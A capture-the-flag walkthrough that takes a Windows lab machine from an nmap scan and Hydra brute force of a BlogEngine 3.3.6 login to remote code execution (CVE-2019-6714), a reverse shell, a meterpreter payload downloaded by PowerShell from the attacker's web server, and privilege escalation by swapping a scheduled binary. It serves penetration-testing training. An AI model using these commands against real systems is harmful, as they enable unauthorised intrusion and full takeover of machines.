You can either check out the target machine's IP address or conduct an nmap scan to find out what services are there.
What is the name of the clown displayed on the frontpage?
Perform an nmap scan with an option to check for software versions (-sV) and to skip host discovery (-Pn).
nmap -sV -Pn [target IP address]
Start dirbuster by typing dirbuster. Choose one of the pre-set wordlists. I used directory-list-2.3-medium.txt in this instance.
The usual location for these wordlists are at /etc/share/wordlists
Dirbuster brags about its progress both on its graphical interface and on the command line. One directory found worth looking into is
check it out on your browser
We see that the website is use BlogEngine as its content management system. Let's do a Google search to see what default credentials are and if we can use them.
Apparently, it uses both admin for default username and password.
Using it doesn't allow us access so now we make an attempt to find out what the password is. We used BurpSuite to help us with this one.
Toggle FoxyProxy on your browser to route traffic to
With BurpSuite intercepting traffic, we can take a closer look at what instructions are being sent to the website.
We're going to use that long cryptic link to brute force the password using Hydra.
Inside the Request box, we're interested in lines 1 and line 16. Line 1 contains the link we're sending the credentials and the HTML command. In this case it's POST /Account/login.aspx?ReturnURL=%2Fadmin
Line 16 shows the specific parameters returned by the website. Somewhere in that long text we'll use to specify how Hydra is going to fuzz the username and password.
You can always type hydra --help in the command prompt to find out how to use it. In this example, we are going to post this command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.84.88 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=p52E5Ou%2FrrWaZJfz92Gx%2FfbpTzKoVM6sywhHUacCZjGLdRonH5QTP1mNXo6Jq1zqGPSjCjx1GW0JD3uK%2FA%2FhRbMYeIQe7X43l9h64%2BmsJm76y2cLnjW7pz4Ryn7HB35fO5iQCx4hkngHGjZYvU1b293j5U%2FrW%2B5mTebe5NHY%2Fp%2FSpmjkwJAQBJ%2FnuqJaZHMqT%2BBW5S2oR3KDpXHmcfY91thBwTqi9%2BSMnB8BZ5l5OkdYDiUlxFHzFlq5W0ursJgtX3ZSfAueXH4mX3fOaAPavgRDeNtIWPWXK1GGM0ZY93VGzHFQhU2ME1rtOZUhVvaFBcMLcvbBY%2FMO4DlZ0Ltr82UAGwz50SoDmVER8E8bc60p%2FXnd&__EVENTVALIDATION=4hWUNiJYjd%2F3Rm1qa7k9GUH%2FRDbBtz2hM7GNL%2BsyQ3QhWVe%2B0ezaK%2FIOB%2B7oJ9bQnn5xzEjvWhAwKaiW5y%2BnI3DthkRl8IRJH61NfmT9GgSZGcnliZMy5%2FrXhlHVtTDzsRkW35dolvtg71GPDhdooRXWAolAvwPL5WJ7hq4wfk%2Fn1dND&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv
-l admin: Hydra will not brute force the username and it will stick with using admin
-P /usr/share/wordlists/rockyou.txt: Tell Hydra what password list you are using
10.10.84.88: The IP address of the machine you're attacking
http-post-form: How the website likes to receive usernames and password
^USER^: This tells Hydra to use the username you provided above, which is admin
^PASS^: Tells Hydra to use the password you provided earlier, which is a wordlist. Hydra knows what to do with it.
Hydra figures out the password: 1qaz2wsx
Go to http://10.10.84.88/admin. Use the IP address of your target machine and enter admin: 1qaz2wsx
We now have access to the administrator panel of the blog. We can create, edit, and delete posts. We can also upload files, including a possible exploit we can use to compromise the computer.
Snoop around. Click the About section of the software they are using and we can see it's BlogEngine 3.3.6. We can use that information to find any existing vulnerabilities to this specific software and version.
Thanks to some ultra-nerds. There exists a website where we can search and download exploits real hackers have already created. Go to https://www.exploit-db.com for that.
Search for blogengine 3.3.6. We are given a handful of possible exploits. We're going to pick the one created by Dustin Cobb on February 12, 2019.
14. What is the CVE? CVE-2019-6714
Raw format. Copy and paste to your text editor.
- You can view the exploit in its raw format or
- Download the file
Exploit is named 46353
The first lines of the exploit outlines how to use it
1. Edit the exploit 46353
2. Tell the exploit to talk to your computer by...
3. Locating this line:
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445))
4. Change the 10.10.10.20 to your IP address
5. Change 4445 to 4444 (or whatever you want, just remember it when you establish a listening port)
6. Save the file as PostList.ascx.cs
Your own IP address
If you don't know your IP address, or your tunneling IP address, enter ip a on your command prompt.
Then use it to modify the exploit file.
Go back to your browser. Click the existing post and edit it. We will use that post to upload the exploit PostView.ascx.cs
This video shows how to upload the exploit
We'll use Netcat to wait for a connection from the target machine. Enter this on your command prompt:
nc -nvlp 4444
-n: do not resolve names
-v: be verbose when a connection happens
-l: listen for a connection at...
-p: port number...
4444: This is the port you specified on #16 above.
Open a new browser tab. Point your browser to [Target IP]://?theme=../../App_Data/files. In this case it will be
Your browser tab will look like it has frozen or has not completed loading. Ignore it. Go back to your command prompt and check Netcat
whoami reveals iisapppool\blog
Netcat will displhay when a connections has reached out successfully. You will see a blank prompt. This target machine is a Windows machine so listing the directory contents will be the command dir.
Type whoami on the command prompt to find out the username or identity of the machine we compromised
24. Escalate the privilege by creating a meterpreter shell
The machine is compromised. However we are not root, and that's what we want so we get ALL the privileges. For that, we will create a meterpreter shell to upload into the compromised machine using the command msfvenom. Explanation below
/windows/meterpreter/reverse_tcp: we will use a reverse connection using the protocol TCP
LHOST=10.9.2.209: Local host, which is your IP address. You determined that earlier using the command ip a as shown on step 17
LPORT=4445: Another listening port. Remember 4444 is already being used on your current connection.
-f exe > shell.exe: Create an executable file named shell.exe
It's a good thing Python got that covered. Inside the command prompt you used to create the meterpreter shell, type this command:
python3 -m http.server 8000
This will start an http server accessible on port 8000. To verify your HTTP server, start a new browser tab and go to [your IP address]:8000 and in this case, it'll be 10.9.2.209:8000
You should see the files you have where you created shell.exe.
From the command prompt at the target machine, enter the command:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
This is telling your machine to use powershell to download the file located at your web server 10.9.2.209:8000/shell.exe and save it on your C:\Windows\Temp\ directory.
You should now see shell.exe inside the C:\Windows\Temp folder.
The Meterpreter shell works with Metasploit. We will start Metasploit before executing the shell.exe on the remote machine. Start it by running:
Within msfconsole, we will use the exploit multi handler. Type
Set handler options
We have to set the proper options so shell.exe will communicate correctly with our Metasploit listener. Enter:
set LHOST [YOUR IP Address] and in this case
set LHOST 10.9.2.209
set LPORT 4445
We are telling MSF to listen on port 4445. Remember we told shell.exe to talk to 10.9.2.209 on port 4445.
You don't have to do this but it's good practice to do so.
32a. Execute the Metasploit listener. Enter:
Running shell.exe from the target machine will start the meterpreter shell. It will communicate with Metasploit. It'll allow us to do more. Go back to the command prompt window running Windows on the remote machine.
Navigate to C:\Windows\Temp if you're not there yet.
Run shell.exe. Enter:
Started reverse TCP handler on 10.9.2.209:4445
Go back to your Metasploit prompt window.
You should see the command run when you ran the listener.
And the next line:
Started reverse TCP handler on 10.9.2.209:4445
We can get more info about the compromised machine by typing the command
winPeas is a program we will run on the remote machine to gather even some more information. What we're looking for is a way to execute an exploit, or a shell in administrator mode. This will allow us to go into restricted folders and access restricted files.
Do a Google search or you can point another browser tab to:
From your hacking machine, navigate to a folder where you want winPEAS to be installed or located. Then clone winPEAS into your machine by copy and pasting the command from github into your command prompt. Type:
git clone https://github.com/carlospolop/PEASS-ng
Now that the software has been cloned. Look around what it is. winPEAS is just one of its components. It's a tool used to gather info about Windows machines. It'll have other utilities for other systems. Type these commands:
You will see that winPEAS is simply a .bat file. It's a Windows file that contains a list of commands it should execute.
Copy winPEAS.bat to the folder where you are hosting your files on the Python web server you started on Step #26.
Now that we're hosting winPEAS and it's accessible to the target machine, we will download it.
Go to to your command prompt window running Windows
Enter the PowerShell command
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
winPEAS has been accessed from the web servver
You should see three lines showing the command it received, the machine's response and the file that has been downloaded
Go back to the command prompt window running the Windows prompt in the remote machine. List the directory contents by entering
Then run it by typing
winPEAS will look up a lot of information about the target machine. Sit back and enjoy.
Somewhere in the video above, approximately at the 0:17 mark, winPEAS lists the running processes, or services. These are programs that run in the background. A lot of them are programs that have been executed by the system, which then runs at the system level. The program is called Windows Scheduler running on WScheduler.exe
What service is interesting?
Windows Scheduler or WScheduler.exe
What is the Windows Build?
Windows 2012 R2 (6.3 Build 9600)
From the Windows command prompt, find the location of the program Scheduler. It is located at
cd c:\Program Files(x86)\SystemScheduler
There are two files worth checking out right away -- 20198415519.INI and 20198415519.INI_LOG.txt. To quickly view the contents, enter
Nothing much there except that it was ran by Administrator. We're on the right track.
One of the programs being executed every few minutes is Message.exe. It must have root privileges because Administrator runs it.
Rename shell.exe into Message.exe. Then copy or move shell.exe into the folder where Message.exe resides. On your command prompt, enter these
copy shell.exe c:\Program Files(x86)\WindowsScheduler
cd c:\Program Files(x86)\WindowsScheduler
ren Message.exe Message.bak
ren shell.exe Message.exe
We have a current Meterpreter session from the shell.exe executed by iisapppool\blog earlier from Step #22.
We will close that by entering exit.
Then simply running the same command
Wait for a few seconds because there is a pause between each Message.exe executions.
You don't have to run the shell command to see the Windows interface. You can poke around using the Metasploit prompt.
The flags are located in:
What is the abnormal service running?
What is the binary you're supposed to exploit?
Original Install Time
8/3/2019, 10:43:23 AM